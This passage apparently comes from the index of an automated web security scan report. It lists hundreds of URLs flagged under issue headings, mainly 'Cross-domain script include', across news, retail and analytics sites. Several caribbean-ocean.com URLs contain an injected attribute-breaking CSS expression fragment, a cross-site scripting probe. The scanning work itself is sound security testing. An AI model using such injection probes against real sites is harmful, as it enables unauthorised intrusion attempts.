20.567. http://www4.jcpenney.com/jcp/x2.aspx

20.568. http://www4.tinker.com/standard/js/common.js

20.569. http://www4.tinker.com/standard/js/map/map.js

20.570. http://www4.tinker.com/standard/widget_sm.html

20.571. http://www5.jcpenney.com/jcp/X6E.aspx

20.572. http://www5.jcpenney.com/jcp/getjcpheaderc.aspx

21. Cross-domain script include

21.1. http://www.4shared.com/

21.2. http://www.4shared.com/advertise/

21.3. http://www.4shared.com/contact.jsp

21.4. http://www.4shared.com/desktop/

21.5. http://www.4shared.com/enter.jsp

21.6. http://www.4shared.com/faq.jsp

21.7. http://www.4shared.com/icons/16x16/

21.8. http://www.4shared.com/index.jsp

21.9. http://www.4shared.com/m/android.jsp

21.10. http://www.4shared.com/m/blackberry.jsp

21.11. http://www.4shared.com/m/symbian.jsp

21.12. http://www.4shared.com/premium.jsp

21.13. http://www.4shared.com/press_room/

21.14. http://www.4shared.com/privacy.jsp

21.15. http://www.4shared.com/remindPassword.jsp

21.16. http://www.4shared.com/resellers.jsp

21.17. http://www.4shared.com/signup.jsp

21.18. http://www.4shared.com/terms.jsp

21.19. http://www.4shared.com/toolbar/

21.20. http://www.activeendurance.com/running.htm

21.21. http://www.addthis.com/bookmark.php

21.22. http://www.admob.com/

21.23. http://www.atlasventure.com/

21.24. http://www.autoinsurancepool.info/

21.25. http://www.b3b.ch/2011/03/27/rien-ne-va-plus-dans-la-securite-linfoguerre-est-declaree/

21.26. http://www.barracudalabs.com/

21.27. http://www.barracudanetworks.com/ns/

21.28. http://www.barracudanetworks.com/ns/

21.29. http://www.barracudanetworks.com/ns/company/

21.30. http://www.barracudanetworks.com/ns/privacy/

21.31. http://www.barracudanetworks.com/ns/products/

21.32. http://www.barracudanetworks.com/ns/products/index.php

21.33. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php

21.34. http://www.barracudanetworks.com/ns/products/spam_overview.php

21.35. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php

21.36. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

21.37. http://www.barracudanetworks.com/ns/purchase/

21.38. https://www.barracudanetworks.com/ns/products/request_eval_unit.php

21.39. http://www.bizfind.us/

21.40. http://www.bizfind.us/Index.asp

21.41. http://www.bizfind.us/search.asp

21.42. http://www.bluefountainmedia.com/about-overview

21.43. http://www.bluefountainmedia.com/about/our-story

21.44. http://www.bluefountainmedia.com/blog/

21.45. http://www.bluefountainmedia.com/blog/jcpenney-black-hat-seo-techniques/

21.46. http://www.bluefountainmedia.com/business/

21.47. http://www.bluefountainmedia.com/case-studies

21.48. http://www.bluefountainmedia.com/case-studies/anthony-for-men

21.49. http://www.bluefountainmedia.com/case-studies/broadway-nails

21.50. http://www.bluefountainmedia.com/case-studies/disney

21.51. http://www.bluefountainmedia.com/case-studies/nfl-youth-pd

21.52. http://www.bluefountainmedia.com/case-studies/r-a-g-new-york

21.53. http://www.bluefountainmedia.com/case-studies/smarties

21.54. http://www.bluefountainmedia.com/case-studies/spafinder

21.55. http://www.bluefountainmedia.com/clients/companies-served

21.56. http://www.bluefountainmedia.com/content-management-systems

21.57. http://www.bluefountainmedia.com/ecommerce-design

21.58. http://www.bluefountainmedia.com/flash-design-development

21.59. http://www.bluefountainmedia.com/portfolio/websites

21.60. http://www.bluefountainmedia.com/search

21.61. http://www.bluefountainmedia.com/team

21.62. http://www.bluefountainmedia.com/website-design-development

21.63. http://www.brash.com/

21.64. http://www.broadcast-interactive.com/

21.65. http://www.businessinsider.com/how-to-estimate-market-size-2011-3

21.66. http://www.caribbean-ocean.com/

21.67. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

21.68. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

21.69. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css

21.70. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif

21.71. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg

21.72. http://www.caribbean-ocean.com/enq.php/stylesheet.css

21.73. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

21.74. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

21.75. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css

21.76. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif

21.77. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg

21.78. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css

21.79. http://www.cmswire.com/events/item/source-boston-006828.php

21.80. http://www.coach.com/online/handbags/Home-10551-10051

21.81. http://www.coach.com/online/handbags/StoreLocatorView

21.82. http://www.comodo.com/

21.83. http://www.comodo.com/business-security/digital-certificates/ssl-certificates.php

21.84. http://www.csoonline.com/article/679466/source-boston-2011-two-views-on-infosec-interviewing-hiring

21.85. http://www.demandmedia.com/studios/writers/

21.86. https://www.demandstudios.com/application.html

21.87. http://www.denimgroup.com/

21.88. http://www.dico-citations.com/vingt-ans-de-placard-les-b-n-fices-a-se-divise-la-r-clusion-a-s-additionne-audiard-michel/

21.89. http://www.digitalbond.com/2008/07/20/managing-your-security-career/

21.90. https://www.digitalbond.com/wp-login.php

21.91. http://www.duechiacchiere.it/wp-slimstat

21.92. http://www.emarketer.com/(S(r0cbc4551ke3ivvedae1jd45))/Article.aspx

21.93. http://www.epsilon.com/

21.94. http://www.espn.co.uk/

21.95. http://www.espncms.com/

21.96. http://www.espnmediazone3.com/us/category/releases/

21.97. http://www.espnshop.com/family/index.jsp

21.98. http://www.eweekeurope.co.uk/news/google-speeds-up-crankshaft-with-chrome-10-beta-21491/x26amp

21.99. http://www.executiveboard.com/

21.100. http://www.executiveboard.com/about/index.html

21.101. http://www.executiveboard.com/contact-us/index.html

21.102. http://www.executiveboard.com/corporate-finance/index.html

21.103. http://www.executiveboard.com/executive-guidance/2011/Q1/index.html

21.104. http://www.executiveboard.com/index.html

21.105. http://www.executiveboard.com/insights/index.html

21.106. http://www.executiveboard.com/services/index.html

21.107. http://www.f-secure.com/weblog/archives/00002127.html

21.108. http://www.facebook.com/2008/fbml

21.109. http://www.facebook.com/BLane77

21.110. http://www.facebook.com/DOUCHE01

21.111. http://www.facebook.com/ESPNNewYork

21.112. http://www.facebook.com/JohnFerrell

21.113. http://www.facebook.com/KOMONews

21.114. http://www.facebook.com/SaMmFalK

21.115. http://www.facebook.com/angie.eronson

21.116. http://www.facebook.com/cdulitz

21.117. http://www.facebook.com/chester.mitre

21.118. http://www.facebook.com/chris.paulette

21.119. http://www.facebook.com/daryl.shelby

21.120. http://www.facebook.com/deejayeric908

21.121. http://www.facebook.com/deekron

21.122. http://www.facebook.com/haydn.long

21.123. http://www.facebook.com/highrock.singers

21.124. http://www.facebook.com/jill.hightower1

21.125. http://www.facebook.com/khristhianssenj

21.126. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

21.127. http://www.facebook.com/plugins/activity.php

21.128. http://www.facebook.com/plugins/activity.php

21.129. http://www.facebook.com/plugins/activity.php

21.130. http://www.facebook.com/plugins/facepile.php

21.131. http://www.facebook.com/plugins/like.php

21.132. http://www.facebook.com/plugins/like.php

21.133. http://www.facebook.com/plugins/like.php

21.134. http://www.facebook.com/plugins/like.php

21.135. http://www.facebook.com/plugins/like.php

21.136. http://www.facebook.com/plugins/like.php

21.137. http://www.facebook.com/plugins/like.php

21.138. http://www.facebook.com/plugins/like.php

21.139. http://www.facebook.com/plugins/likebox.php

21.140. http://www.facebook.com/plugins/likebox.php

21.141. http://www.facebook.com/plugins/likebox.php

21.142. http://www.facebook.com/plugins/likebox.php

21.143. http://www.facebook.com/plugins/likebox.php

21.144. http://www.facebook.com/profile.php

21.145. http://www.facebook.com/raymond.cree

21.146. http://www.facebook.com/scottskomo

21.147. http://www.facebook.com/sharer.php

21.148. http://www.facebook.com/sharer.php

21.149. http://www.facebook.com/tracey.westerlund

21.150. http://www.facebook.com/viglink

21.151. http://www.freebox-v6.fr/

21.152. http://www.freebox-v6.fr/index.php/blog/article/52/Demandez-votre-Gamepad

21.153. http://www.freebox-v6.fr/index.php/blog/article/74/Freebox-V6-le-point-sur-les-livraisons

21.154. http://www.garage4hackers.com/showthread.php

21.155. http://www.gfi.com/

21.156. http://www.glam.com/

21.157. http://www.glam.com/

21.158. http://www.glam.com/

21.159. http://www.glam.com/app/site/affiliate/viewChannelModule.act

21.160. http://www.glam.com/app/site/affiliate/viewChannelModule.act

21.161. http://www.glam.com/app/site/affiliate/viewChannelModule.act

21.162. http://www.google.com/uds/solutions/localsearch/gmlocalsearch.js

21.163. https://www.google.com/adsense/support/bin/request.py

21.164. https://www.infosecisland.com/blogview/12822-Spear-Phishing-Season-Is-Declared-Open.html

21.165. http://www.infosecleaders.com/

21.166. http://www.internetnews.com/img/blog/gradient.gif

21.167. http://www.isecpartners.com/

21.168. http://www.jcpenney.com/jcp/default.aspx

21.169. http://www.jcpstoreads.com/jcpenney/Default.aspx

21.170. http://www.jotform.com/form/2910946098

21.171. http://www.komonews.com/

21.172. http://www.komonews.com/about

21.173. http://www.komonews.com/about/42141282.html

21.174. http://www.komonews.com/about/88685637.html

21.175. http://www.komonews.com/about/contact

21.176. http://www.komonews.com/about/events

21.177. http://www.komonews.com/about/people/fournews/4257946.html

21.178. http://www.komonews.com/about/people/fournews/4259526.html

21.179. http://www.komonews.com/about/people/fournews/57733327.html

21.180. http://www.komonews.com/about/people/fournews/Paul-Deanno.html

21.181. http://www.komonews.com/about/people/site/Scott-Sistek.html

21.182. http://www.komonews.com/about/privacy

21.183. http://www.komonews.com/about/schedule

21.184. http://www.komonews.com/about/terms

21.185. http://www.komonews.com/aboutradio

21.186. http://www.komonews.com/aboutradio/live/42934697.html

21.187. http://www.komonews.com/advertise

21.188. http://www.komonews.com/communities

21.189. http://www.komonews.com/entertainment

21.190. http://www.komonews.com/home/video/116474128.html

21.191. http://www.komonews.com/home/video/116545678.html

21.192. http://www.komonews.com/home/video/116673784.html

21.193. http://www.komonews.com/home/video/116675584.html

21.194. http://www.komonews.com/home/video/116675749.html

21.195. http://www.komonews.com/home/video/116702184.html

21.196. http://www.komonews.com/hotlinks

21.197. http://www.komonews.com/live

21.198. http://www.komonews.com/living

21.199. http://www.komonews.com/news/

21.200. http://www.komonews.com/news/116650859.html

21.201. http://www.komonews.com/news/116650859.html

21.202. http://www.komonews.com/news/116652534.html

21.203. http://www.komonews.com/news/116694569.html

21.204. http://www.komonews.com/news/116694569.html

21.205. http://www.komonews.com/news/116694614.html

21.206. http://www.komonews.com/news/116707379.html

21.207. http://www.komonews.com/news/116727124.html

21.208. http://www.komonews.com/news/boeing/116707614.html

21.209. http://www.komonews.com/news/business

21.210. http://www.komonews.com/news/business/116735244.html

21.211. http://www.komonews.com/news/business/116739564.html

21.212. http://www.komonews.com/news/business/116739939.html

21.213. http://www.komonews.com/news/business/116740159.html

21.214. http://www.komonews.com/news/business/116740389.html

21.215. http://www.komonews.com/news/consumer

21.216. http://www.komonews.com/news/consumer/116673109.html

21.217. http://www.komonews.com/news/consumer/116704069.html

21.218. http://www.komonews.com/news/content/9958596.html

21.219. http://www.komonews.com/news/content/scanner

21.220. http://www.komonews.com/news/content/schools/36500344.html

21.221. http://www.komonews.com/news/entertainment

21.222. http://www.komonews.com/news/entertainment/116123569.html

21.223. http://www.komonews.com/news/entertainment/116189709.html

21.224. http://www.komonews.com/news/entertainment/116665019.html

21.225. http://www.komonews.com/news/entertainment/116680394.html

21.226. http://www.komonews.com/news/entertainment/116692424.html

21.227. http://www.komonews.com/news/entertainment/116704174.html

21.228. http://www.komonews.com/news/entertainment/116707059.html

21.229. http://www.komonews.com/news/entertainment/116710289.html

21.230. http://www.komonews.com/news/entertainment/116737029.html

21.231. http://www.komonews.com/news/entertainment/116737724.html

21.232. http://www.komonews.com/news/health

21.233. http://www.komonews.com/news/health/116753189.html

21.234. http://www.komonews.com/news/local

21.235. http://www.komonews.com/news/local/

21.236. http://www.komonews.com/news/local/116231884.html

21.237. http://www.komonews.com/news/local/116509853.html

21.238. http://www.komonews.com/news/local/116694614.html

21.239. http://www.komonews.com/news/local/116703604.html

21.240. http://www.komonews.com/news/local/116703604.html

21.241. http://www.komonews.com/news/local/116706579.html

21.242. http://www.komonews.com/news/local/116707379.html

21.243. http://www.komonews.com/news/local/116712649.html

21.244. http://www.komonews.com/news/local/116714899.html

21.245. http://www.komonews.com/news/local/116727124.html

21.246. http://www.komonews.com/news/local/116745309.html

21.247. http://www.komonews.com/news/local/116752479.html

21.248. http://www.komonews.com/news/local/116755469.html

21.249. http://www.komonews.com/news/national

21.250. http://www.komonews.com/news/national/

21.251. http://www.komonews.com/news/national/115640079.html

21.252. http://www.komonews.com/news/national/116404039.html

21.253. http://www.komonews.com/news/national/116502428.html

21.254. http://www.komonews.com/news/national/116713504.html

21.255. http://www.komonews.com/news/national/116734714.html

21.256. http://www.komonews.com/news/national/116736489.html

21.257. http://www.komonews.com/news/national/116736624.html

21.258. http://www.komonews.com/news/national/116747399.html

21.259. http://www.komonews.com/news/national/116750534.html

21.260. http://www.komonews.com/news/national/116750784.html

21.261. http://www.komonews.com/news/offbeat

21.262. http://www.komonews.com/news/offbeat/116565253.html

21.263. http://www.komonews.com/news/offbeat/116611588.html

21.264. http://www.komonews.com/news/offbeat/116622758.html

21.265. http://www.komonews.com/news/offbeat/116623473.html

21.266. http://www.komonews.com/news/offbeat/116690659.html

21.267. http://www.komonews.com/news/offbeat/116708664.html

21.268. http://www.komonews.com/news/offbeat/116708719.html

21.269. http://www.komonews.com/news/offbeat/116749349.html

21.270. http://www.komonews.com/news/problemsolvers

21.271. http://www.komonews.com/news/tech

21.272. http://www.komonews.com/news/tech/116596303.html

21.273. http://www.komonews.com/news/tech/116609493.html

21.274. http://www.komonews.com/news/tech/116666119.html

21.275. http://www.komonews.com/news/tech/116674969.html

21.276. http://www.komonews.com/news/tech/116740874.html

21.277. http://www.komonews.com/news/tech/116748424.html

21.278. http://www.komonews.com/news/topline

21.279. http://www.komonews.com/news/topline/116742439.html

21.280. http://www.komonews.com/obits

21.281. http://www.komonews.com/obits/

21.282. http://www.komonews.com/opinion/kenschram

21.283. http://www.komonews.com/opinion/kenschram/116741919.html

21.284. http://www.komonews.com/sports

21.285. http://www.komonews.com/sports/

21.286. http://www.komonews.com/sports/116570948.html

21.287. http://www.komonews.com/sports/116572113.html

21.288. http://www.komonews.com/sports/116601093.html

21.289. http://www.komonews.com/sports/116612208.html

21.290. http://www.komonews.com/sports/116713754.html

21.291. http://www.komonews.com/traffic

21.292. http://www.komonews.com/traffic/flights

21.293. http://www.komonews.com/traffic/passreports

21.294. http://www.komonews.com/weather

21.295. http://www.komonews.com/weather/blogs

21.296. http://www.komonews.com/weather/blogs/

21.297. http://www.komonews.com/weather/blogs/scott

21.298. http://www.komonews.com/weather/blogs/scott/116619838.html

21.299. http://www.komonews.com/weather/blogs/scott/116678464.html

21.300. http://www.komonews.com/weather/blogs/scott/116715374.html

21.301. http://www.komonews.com/weather/blogs/scott/116732159.html

21.302. http://www.komonews.com/weather/blogs/shannon

21.303. http://www.komonews.com/weather/cameras

21.304. http://www.komonews.com/weather/faq

21.305. http://www.komonews.com/weather/faq/4308877.html

21.306. http://www.komonews.com/weather/faq/4310827.html

21.307. http://www.komonews.com/weather/hotlinks

21.308. http://www.komonews.com/weather/maps

21.309. http://www.komonews.com/weather/quakes

21.310. http://www.komonews.com/weather/radar

21.311. http://www.komonews.com/weather/radar/4327257.html

21.312. http://www.komonews.com/weather/satellite

21.313. http://www.komonews.com/weather/skireport

21.314. http://www.komonews.com/younews

21.315. http://www.komonews.com/younews/116761799.html

21.316. http://www.komonews.com/younews/116762164.html

21.317. http://www.komonews.com/younews/116762524.html

21.318. http://www.komonews.com/younews/116762774.html

21.319. http://www.komonews.com/younews/116762809.html

21.320. http://www.korben.info/hack-de-twitter-la-suite.html

21.321. http://www.leanlogistics.com/

21.322. http://www.leanlogistics.com/leanlogistics_contact.html

21.323. http://www.lemonde.fr/economie/article/2011/04/13/soupcons-d-espionnage-chez-safran-sans-vol-de-donnees-a-caractere-industriel_1506757_3234.html

21.324. http://www.lightspeedvp.com/

21.325. http://www.loggly.com/

21.326. http://www.madsecinc.com/

21.327. http://www.mandiant.com/

21.328. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

21.329. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

21.330. http://www.manta.com/mb_34_E33B9_000/refuse_systems

21.331. http://www.manta.com/member/register/

21.332. http://www.manta.com/profile/my-companies/select

21.333. http://www.massey-coldbeck.co.uk/

21.334. http://www.massey-coldbeck.co.uk/1ph.html

21.335. http://www.massey-coldbeck.co.uk/centridffan.html

21.336. http://www.massey-coldbeck.co.uk/crossflow.html

21.337. http://www.massey-coldbeck.co.uk/electricmotorrange.htm

21.338. http://www.massey-coldbeck.co.uk/haz.html

21.339. http://www.massey-coldbeck.co.uk/links.htm

21.340. http://www.massey-coldbeck.co.uk/map.htm

21.341. http://www.massey-coldbeck.co.uk/services.htm

21.342. http://www.medialets.com/

21.343. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

21.344. http://www.meetup.com/San-Francisco-Blog-Club/

21.345. http://www.metropcs.com/

21.346. http://www.microsoft.com/global/security/microsites/msrc/PublishingImages/spacer.gif

21.347. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js

21.348. http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5

21.349. http://www.miscmag.com/

21.350. http://www.miscmag.com/index.php/2011/03/25/edito-misc-hs-n°3

21.351. http://www.multiupload.com/J9I8NFWPT0

21.352. http://www.multiupload.com/TGDP99CJLH

21.353. http://www.murraynewlands.com/

21.354. http://www.ncircle.com/

21.355. http://www.ndbc.noaa.gov/station_page.php

21.356. http://www.net-security.org/

21.357. http://www.newsvine.com/_wine/save

21.358. http://www.noaanews.noaa.gov/stories2011/20110223_coralspeech.html

21.359. http://www.noaanews.noaa.gov/stories2011/20110224_climate.html

21.360. http://www.opensource.org/licenses/gpl-license.php

21.361. http://www.opensource.org/licenses/mit-license.php

21.362. http://www.outsourcermarketplace.com/faq.php

21.363. http://www.packetmotion.com/

21.364. http://www.paper-source.com/cgi-bin/paper/locations/ma_boston.html

21.365. http://www.performancemarketingassociation.com/advocateform.html

21.366. http://www.poisonivy-rat.com/

21.367. http://www.polygonhomes.com/polygon/communities/ThisCommunity.aspx

21.368. http://www.protides.com/washington/

21.369. http://www.pwnieexpress.com/

21.370. http://www.quantcast.com/

21.371. http://www.quantcast.com/4shared.com

21.372. http://www.quantcast.com/about

21.373. http://www.quantcast.com/about.com

21.374. http://www.quantcast.com/accuweather.com

21.375. http://www.quantcast.com/ad4game.com

21.376. http://www.quantcast.com/adobe.com

21.377. http://www.quantcast.com/allrecipes.com

21.378. http://www.quantcast.com/amazon.com

21.379. http://www.quantcast.com/ancestry.com

21.380. http://www.quantcast.com/angelfire.com

21.381. http://www.quantcast.com/answerbag.com

21.382. http://www.quantcast.com/answers.com

21.383. http://www.quantcast.com/aol.com

21.384. http://www.quantcast.com/api/suggest

21.385. http://www.quantcast.com/apple.com

21.386. http://www.quantcast.com/articlesbase.com

21.387. http://www.quantcast.com/ask.com

21.388. http://www.quantcast.com/askmen.com

21.389. http://www.quantcast.com/associatedcontent.com

21.390. http://www.quantcast.com/att.com

21.391. http://www.quantcast.com/autotrader.com

21.392. http://www.quantcast.com/babycenter.com

21.393. http://www.quantcast.com/bankofamerica.com

21.394. http://www.quantcast.com/barnesandnoble.com

21.395. http://www.quantcast.com/bbc.co.uk

21.396. http://www.quantcast.com/bestbuy.com

21.397. http://www.quantcast.com/bing.com

21.398. http://www.quantcast.com/bizrate.com

21.399. http://www.quantcast.com/bleacherreport.com

21.400. http://www.quantcast.com/blogger.com

21.401. http://www.quantcast.com/blogspot.com

21.402. http://www.quantcast.com/blurtit.com

21.403. http://www.quantcast.com/borders.com

21.404. http://www.quantcast.com/boreme.com

21.405. http://www.quantcast.com/break.com

21.406. http://www.quantcast.com/brothersoft.com

21.407. http://www.quantcast.com/buycheapr.com

21.408. http://www.quantcast.com/ca.gov

21.409. http://www.quantcast.com/candystand.com

21.410. http://www.quantcast.com/capitalone.com

21.411. http://www.quantcast.com/careerbuilder.com

21.412. http://www.quantcast.com/careers

21.413. http://www.quantcast.com/causes.com

21.414. http://www.quantcast.com/cbsnews.com

21.415. http://www.quantcast.com/cbssports.com

21.416. http://www.quantcast.com/chacha.com

21.417. http://www.quantcast.com/chase.com

21.418. http://www.quantcast.com/city-data.com

21.419. http://www.quantcast.com/cnbc.com

21.420. http://www.quantcast.com/cnet.com

21.421. http://www.quantcast.com/cnn.com

21.422. http://www.quantcast.com/comcast.com

21.423. http://www.quantcast.com/comcast.net

21.424. http://www.quantcast.com/contact

21.425. http://www.quantcast.com/coolmath-games.com

21.426. http://www.quantcast.com/craigslist.org

21.427. http://www.quantcast.com/dailymotion.com

21.428. http://www.quantcast.com/dell.com

21.429. http://www.quantcast.com/deviantart.com

21.430. http://www.quantcast.com/digg.com

21.431. http://www.quantcast.com/directv.com

21.432. http://www.quantcast.com/docstoc.com

21.433. http://www.quantcast.com/drudgereport.com

21.434. http://www.quantcast.com/drugs.com

21.435. http://www.quantcast.com/ebay.com

21.436. http://www.quantcast.com/edmunds.com

21.437. http://www.quantcast.com/ehow.com

21.438. http://www.quantcast.com/etsy.com

21.439. http://www.quantcast.com/evite.com

21.440. http://www.quantcast.com/ew.com

21.441. http://www.quantcast.com/examiner.com

21.442. http://www.quantcast.com/expedia.com

21.443. http://www.quantcast.com/ezinearticles.com

21.444. http://www.quantcast.com/facebook.com

21.445. http://www.quantcast.com/fedex.com

21.446. http://www.quantcast.com/filestube.com

21.447. http://www.quantcast.com/filmannex.com

21.448. http://www.quantcast.com/fixya.com

21.449. http://www.quantcast.com/flickr.com

21.450. http://www.quantcast.com/foodnetwork.com

21.451. http://www.quantcast.com/formspring.me

21.452. http://www.quantcast.com/foxnews.com

21.453. http://www.quantcast.com/gawker.com

21.454. http://www.quantcast.com/go.com

21.455. http://www.quantcast.com/godaddy.com

21.456. http://www.quantcast.com/google.com

21.457. http://www.quantcast.com/grindtv.com

21.458. http://www.quantcast.com/healthgrades.com

21.459. http://www.quantcast.com/homedepot.com

21.460. http://www.quantcast.com/howstuffworks.com

21.461. http://www.quantcast.com/hp.com

21.462. http://www.quantcast.com/hubpages.com

21.463. http://www.quantcast.com/huffingtonpost.com

21.464. http://www.quantcast.com/hulu.com

21.465. http://www.quantcast.com/ign.com

21.466. http://www.quantcast.com/imdb.com

21.467. http://www.quantcast.com/indeed.com

21.468. http://www.quantcast.com/inside-quantcast

21.469. http://www.quantcast.com/intuit.com

21.470. http://www.quantcast.com/irs.gov

21.471. http://www.quantcast.com/jcpenney.com

21.472. http://www.quantcast.com/justanswer.com

21.473. http://www.quantcast.com/kohls.com

21.474. http://www.quantcast.com/komonews.com

21.475. http://www.quantcast.com/legacy.com

21.476. http://www.quantcast.com/linkedin.com

21.477. http://www.quantcast.com/live.com

21.478. http://www.quantcast.com/local.com

21.479. http://www.quantcast.com/localpages.com

21.480. http://www.quantcast.com/lowes.com

21.481. http://www.quantcast.com/manta.com

21.482. http://www.quantcast.com/mapquest.com

21.483. http://www.quantcast.com/match.com

21.484. http://www.quantcast.com/mayoclinic.com

21.485. http://www.quantcast.com/medicinenet.com

21.486. http://www.quantcast.com/merchantcircle.com

21.487. http://www.quantcast.com/merriam-webster.com

21.488. http://www.quantcast.com/metacafe.com

21.489. http://www.quantcast.com/microsoft.com

21.490. http://www.quantcast.com/miniclip.com

21.491. http://www.quantcast.com/monster.com

21.492. http://www.quantcast.com/moviefone.com

21.493. http://www.quantcast.com/msn.com

21.494. http://www.quantcast.com/mtv.com

21.495. http://www.quantcast.com/myspace.com

21.496. http://www.quantcast.com/nbc.com

21.497. http://www.quantcast.com/netflix.com

21.498. http://www.quantcast.com/nfl.com

21.499. http://www.quantcast.com/nih.gov

21.500. http://www.quantcast.com/noaa.gov

21.501. http://www.quantcast.com/norton.com

21.502. http://www.quantcast.com/nydailynews.com

21.503. http://www.quantcast.com/nytimes.com

21.504. http://www.quantcast.com/opt-out

21.505. http://www.quantcast.com/overstock.com

21.506. http://www.quantcast.com/p-23Fqia_-MkKko

21.507. http://www.quantcast.com/pandora.com

21.508. http://www.quantcast.com/paypal.com

21.509. http://www.quantcast.com/people.com

21.510. http://www.quantcast.com/photobucket.com

21.511. http://www.quantcast.com/planner

21.512. http://www.quantcast.com/pogo.com

21.513. http://www.quantcast.com/privacy

21.514. http://www.quantcast.com/profile-index

21.515. http://www.quantcast.com/pronto.com

21.516. http://www.quantcast.com/reddit.com

21.517. http://www.quantcast.com/reference.com

21.518. http://www.quantcast.com/righthealth.com

21.519. http://www.quantcast.com/rockyou.com

21.520. http://www.quantcast.com/rr.com

21.521. http://www.quantcast.com/scribd.com

21.522. http://www.quantcast.com/search

21.523. http://www.quantcast.com/searchassist.com

21.524. http://www.quantcast.com/sears.com

21.525. http://www.quantcast.com/shopathome.com

21.526. http://www.quantcast.com/shoplocal.com

21.527. http://www.quantcast.com/shopping.com

21.528. http://www.quantcast.com/shopzilla.com

21.529. http://www.quantcast.com/simplyhired.com

21.530. http://www.quantcast.com/sitemap-page

21.531. http://www.quantcast.com/smileycentral.com

21.532. http://www.quantcast.com/softonic.com

21.533. http://www.quantcast.com/spokeo.com

21.534. http://www.quantcast.com/squidoo.com

21.535. http://www.quantcast.com/staples.com

21.536. http://www.quantcast.com/suite101.com

21.537. http://www.quantcast.com/superpages.com

21.538. http://www.quantcast.com/target.com

21.539. http://www.quantcast.com/terms

21.540. http://www.quantcast.com/thefind.com

21.541. http://www.quantcast.com/thesaurus.com

21.542. http://www.quantcast.com/time.com

21.543. http://www.quantcast.com/tmz.com

21.544. http://www.quantcast.com/top-sites

21.545. http://www.quantcast.com/top-sites-1

21.546. http://www.quantcast.com/top-sites/AD

21.547. http://www.quantcast.com/top-sites/AE

21.548. http://www.quantcast.com/top-sites/AF

21.549. http://www.quantcast.com/top-sites/AG

21.550. http://www.quantcast.com/top-sites/AI

21.551. http://www.quantcast.com/top-sites/AL

21.552. http://www.quantcast.com/top-sites/AM

21.553. http://www.quantcast.com/top-sites/AN

21.554. http://www.quantcast.com/top-sites/AO

21.555. http://www.quantcast.com/top-sites/AQ

21.556. http://www.quantcast.com/top-sites/AR

21.557. http://www.quantcast.com/top-sites/AS

21.558. http://www.quantcast.com/top-sites/AT

21.559. http://www.quantcast.com/top-sites/AU

21.560. http://www.quantcast.com/top-sites/AW

21.561. http://www.quantcast.com/top-sites/AX

21.562. http://www.quantcast.com/top-sites/AZ

21.563. http://www.quantcast.com/top-sites/BA

21.564. http://www.quantcast.com/top-sites/BB

21.565. http://www.quantcast.com/top-sites/BD

21.566. http://www.quantcast.com/top-sites/BE

21.567. http://www.quantcast.com/top-sites/BF

21.568. http://www.quantcast.com/top-sites/BG

21.569. http://www.quantcast.com/top-sites/BH

21.570. http://www.quantcast.com/top-sites/BI

21.571. http://www.quantcast.com/top-sites/BJ

21.572. http://www.quantcast.com/top-sites/BM

21.573. http://www.quantcast.com/top-sites/BN

21.574. http://www.quantcast.com/top-sites/BO

21.575. http://www.quantcast.com/top-sites/BR

21.576. http://www.quantcast.com/top-sites/BS

21.577. http://www.quantcast.com/top-sites/BT

21.578. http://www.quantcast.com/top-sites/BV

21.579. http://www.quantcast.com/top-sites/BW

21.580. http://www.quantcast.com/top-sites/BY

21.581. http://www.quantcast.com/top-sites/BZ

21.582. http://www.quantcast.com/top-sites/CA

21.583. http://www.quantcast.com/top-sites/CC

21.584. http://www.quantcast.com/top-sites/CD

21.585. http://www.quantcast.com/top-sites/CF

21.586. http://www.quantcast.com/top-sites/CG

21.587. http://www.quantcast.com/top-sites/CH

21.588. http://www.quantcast.com/top-sites/CI

21.589. http://www.quantcast.com/top-sites/CK

21.590. http://www.quantcast.com/top-sites/CL

21.591. http://www.quantcast.com/top-sites/CM

21.592. http://www.quantcast.com/top-sites/CN

21.593. http://www.quantcast.com/top-sites/CO

21.594. http://www.quantcast.com/top-sites/CR

21.595. http://www.quantcast.com/top-sites/CU

21.596. http://www.quantcast.com/top-sites/CV

21.597. http://www.quantcast.com/top-sites/CX

21.598. http://www.quantcast.com/top-sites/CY

21.599. http://www.quantcast.com/top-sites/CZ

21.600. http://www.quantcast.com/top-sites/DE

21.601. http://www.quantcast.com/top-sites/DJ

21.602. http://www.quantcast.com/top-sites/DK

21.603. http://www.quantcast.com/top-sites/DM

21.604. http://www.quantcast.com/top-sites/DO

21.605. http://www.quantcast.com/top-sites/DZ

21.606. http://www.quantcast.com/top-sites/EC

21.607. http://www.quantcast.com/top-sites/EE

21.608. http://www.quantcast.com/top-sites/EG

21.609. http://www.quantcast.com/top-sites/EH

21.610. http://www.quantcast.com/top-sites/ER

21.611. http://www.quantcast.com/top-sites/ES

21.612. http://www.quantcast.com/top-sites/ET

21.613. http://www.quantcast.com/top-sites/FI

21.614. http://www.quantcast.com/top-sites/FJ

21.615. http://www.quantcast.com/top-sites/FK

21.616. http://www.quantcast.com/top-sites/FM

21.617. http://www.quantcast.com/top-sites/FO

21.618. http://www.quantcast.com/top-sites/FR

21.619. http://www.quantcast.com/top-sites/GA

21.620. http://www.quantcast.com/top-sites/GB

21.621. http://www.quantcast.com/top-sites/GD

21.622. http://www.quantcast.com/top-sites/GE

